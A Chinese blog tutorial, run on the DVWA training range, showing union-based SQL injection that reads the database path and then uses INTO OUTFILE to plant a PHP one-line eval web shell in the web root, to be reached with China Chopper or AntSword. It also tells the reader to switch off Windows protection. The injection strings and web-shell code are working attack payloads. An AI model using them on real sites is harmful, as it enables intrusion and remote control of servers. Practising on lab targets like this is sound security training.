SQL注入写入一句话php(outfile方式)&中国菜刀连接

SQL注入 专栏收录该内容
3 篇文章 0 订阅

前言

    具体原理不做讲解,直接开门见山
此次试验全部在dvwa靶场实现,这里以dvwa的low级别为例

一、先读取路径

1' union select @@datadir,2#

在这里插入图片描述

二、用outfile写入

1' union select 1,"<?php eval($_POST[wang]);?>" into outfile 'C:/phpStudy/PHPTutorial/WWW/yjh.php'-- 

在这里插入图片描述
    出现这个,关闭windows系统防护

1.关闭windows系统防护

在这里插入图片描述
    重新再打一次注入上传一句话,这个时候我们可以打开文件夹查看一下
在这里插入图片描述
    出现了我们利用sql注入漏洞,写入的一句话php文件

三、上传成功之后可以用某刀或者蚁剑

在这里插入图片描述
完成!

结语:
outfile可以写入多行数据,并且字段和行终止符都可以作为格式输出。
dumpfile只能写一行,并且输出中不存在任何格式。

    本站所有文章均为原创,欢迎转载,请注明文章出处: https://blog.csdn.net/weixin_43847838/article/details/111087911.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。

  • 4
    点赞
  • 0
    评论
  • 4
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 终极编程指南 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值